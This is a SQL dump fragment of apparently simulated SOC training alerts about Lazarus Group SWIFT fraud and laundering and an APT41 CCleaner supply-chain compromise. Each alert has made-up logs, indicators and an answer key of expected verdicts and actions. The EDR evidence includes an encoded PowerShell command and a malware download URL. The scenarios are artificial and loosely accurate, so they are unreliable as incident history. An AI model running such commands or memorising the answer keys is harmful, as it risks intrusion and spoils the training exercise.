'{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.104\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Intelligence\",\"verdict\":\"internal\",\"details\":\"Known internal IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Intelligence\",\"verdict\":\"internal\",\"details\":\"Known SWIFT server IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"swift_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Intelligence\",\"verdict\":\"internal\",\"details\":\"Compromised internal user account.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated 
with Lazarus Group malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(819, 'Manipulation of SWIFT Messages - Step 5', 'critical', 'SWIFT transaction logs', 'Lazarus Group has manipulated SWIFT messages to conceal fraudulent transactions totaling $951 million. The threat actors have executed a sophisticated operation, altering transaction details to evade detection.', 'Data Manipulation', 'T1565.002 - Data Manipulation: Transaction Manipulation', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-18T03:42:11Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"swift_operator\",\"transaction_id\":\"TXN123456789\",\"original_amount\":\"10,000 USD\",\"manipulated_amount\":\"951,000,000 USD\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"swiftmanip.exe\",\"comment\":\"Transaction details altered successfully\",\"alert_id\":\"ALERT5678\",\"status\":\"Fraudulent\"}', '2026-01-12 22:20:52', '2026-02-16 17:59:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known Lazarus Group IP associated with financial attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal SWIFT server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by Lazarus Group.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"swiftmanip.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"Executable used in SWIFT transaction 
manipulation.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"swift_operator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Employee Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user compromised by attackers.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered 
successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.470Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-18T03:42:11Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user\\\":\\\"swift_operator\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"original_amount\\\":\\\"10,000 USD\\\",\\\"manipulated_amount\\\":\\\"951,000,000 USD\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malware_filename\\\":\\\"swiftmanip.exe\\\",\\\"comment\\\":\\\"Transaction details altered successfully\\\",\\\"alert_id\\\":\\\"ALERT5678\\\",\\\"status\\\":\\\"Fraudulent\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(820, 'Exfiltration of Stolen Funds', 'critical', 'International bank transfer records', 'The attackers successfully exfiltrated a portion of the funds, transferring them to accounts in the Philippines for laundering. Indicators of compromise include suspicious international bank transfer activities and known malicious IP addresses linked to the Lazarus Group.', 'Data Exfiltration', 'T1048: Data Exfiltration Over Alternative Protocol', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"103.123.45.67\",\"destination_ip\":\"192.168.10.25\",\"transaction_id\":\"TXN123456789\",\"amount\":\"5,000,000 USD\",\"destination_country\":\"Philippines\",\"malware_hash\":\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\",\"suspected_tool\":\"WannaCry\",\"user\":\"internal_user@bank.com\",\"filename\":\"transfer_record.xlsx\",\"status\":\"Completed\"}', '2026-01-12 22:20:52', '2026-02-16 17:58:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"103.123.45.67\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group operations.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry malware.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"transfer_record.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"File used during unauthorized fund transfers.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'DLP', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 
USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.471Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"source_ip\\\":\\\"103.123.45.67\\\",\\\"destination_ip\\\":\\\"192.168.10.25\\\",\\\"transaction_id\\\":\\\"TXN123456789\\\",\\\"amount\\\":\\\"5,000,000 USD\\\",\\\"destination_country\\\":\\\"Philippines\\\",\\\"malware_hash\\\":\\\"f2c7a3a849b8f8c7a3a849b8f8c7a3a8\\\",\\\"suspected_tool\\\":\\\"WannaCry\\\",\\\"user\\\":\\\"internal_user@bank.com\\\",\\\"filename\\\":\\\"transfer_record.xlsx\\\",\\\"status\\\":\\\"Completed\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(821, 'Funds Laundered via Philippine Casinos - Step 7', 'critical', 'Financial transaction monitoring', 'In the final stage of the operation, the stolen funds are laundered through Philippine casinos, making the money difficult to trace. This step involves complex transactions designed to obscure the origin of the funds.', 'Money Laundering', 'T1041 - Exfiltration Over C2 Channel', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-02T15:45:23Z\",\"transaction_id\":\"TRX789654123\",\"source_ip\":\"192.168.1.10\",\"destination_ip\":\"203.160.75.123\",\"amount\":500000,\"currency\":\"USD\",\"destination_account\":\"PH-CAS-9876543210\",\"malware_hash\":\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\",\"associated_user\":\"j.smith@banklocal.com\",\"casinos_involved\":[\"ManilaCasino1\",\"CebuCasino2\"],\"attack_pattern\":\"Complex financial transactions\",\"notes\":\"Final laundering step observed with funds transferred to high-risk casino accounts.\"}', '2026-01-12 22:20:52', '2026-02-16 17:59:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP used to initiate transaction.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.160.75.123\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Destination IP associated with high-risk gambling activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with custom Lazarus Group malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.smith@banklocal.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Records\",\"verdict\":\"suspicious\",\"details\":\"User account linked to anomalous 
transactions.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred 
to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.473Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-02T15:45:23Z\\\",\\\"transaction_id\\\":\\\"TRX789654123\\\",\\\"source_ip\\\":\\\"192.168.1.10\\\",\\\"destination_ip\\\":\\\"203.160.75.123\\\",\\\"amount\\\":500000,\\\"currency\\\":\\\"USD\\\",\\\"destination_account\\\":\\\"PH-CAS-9876543210\\\",\\\"malware_hash\\\":\\\"3d7f2b8a9ecf5b2a3f5b4c6d8f9e8c1d\\\",\\\"associated_user\\\":\\\"j.smith@banklocal.com\\\",\\\"casinos_involved\\\":[\\\"ManilaCasino1\\\",\\\"CebuCasino2\\\"],\\\"attack_pattern\\\":\\\"Complex financial transactions\\\",\\\"notes\\\":\\\"Final laundering step observed with funds transferred to high-risk casino accounts.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(822, 'Initial Compromise via CCleaner', 'high', 'Network Traffic Analysis', 'APT41 leveraged a supply chain attack by distributing a compromised version of CCleaner, a trusted software, to gain initial access to systems. The attack was identified through unusual network traffic patterns, confirming the presence of a known malicious hash associated with the CCleaner supply chain attack.', 'Supply Chain Attack', 'T1195.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:34:29Z\",\"source_ip\":\"192.168.1.100\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTP\",\"url\":\"http://malicious-update.com/ccleaner.exe\",\"downloaded_file_hash\":\"b2f5ff47436671b6e533d8dc3614845d\",\"username\":\"jdoe\",\"filename\":\"ccleaner.exe\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"event_type\":\"download\",\"event_description\":\"User downloaded a compromised version of CCleaner.\"}', '2026-01-12 22:25:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelligencePlatform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous supply chain attacks by APT41.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b2f5ff47436671b6e533d8dc3614845d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a malicious version of CCleaner.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-update.com/ccleaner.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"OpenPhish\",\"verdict\":\"malicious\",\"details\":\"URL known to distribute malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 
'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(823, 'Deployment of Second-Stage Payload', 'high', 'Endpoint Detection and Response', 'APT41 executed a second-stage payload on high-value technology companies, targeting specifically chosen entities for espionage.', 'Targeted Espionage', 'T1071.001 - Application Layer Protocol: Web Protocols', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:23:45Z\",\"event_id\":\"EID-20231001-5678\",\"source_ip\":\"203.0.113.5\",\"destination_ip\":\"192.168.1.100\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"filename\":\"payload.exe\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"host_ip\":\"10.0.0.25\",\"network_segment\":\"corporate\",\"action\":\"Executed\",\"description\":\"The second-stage payload was executed successfully on the targeted host.\"}', '2026-01-12 22:25:20', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 command and control server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by APT41.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malware associated with APT41 activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"suspicious\",\"details\":\"Unusual file execution detected.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
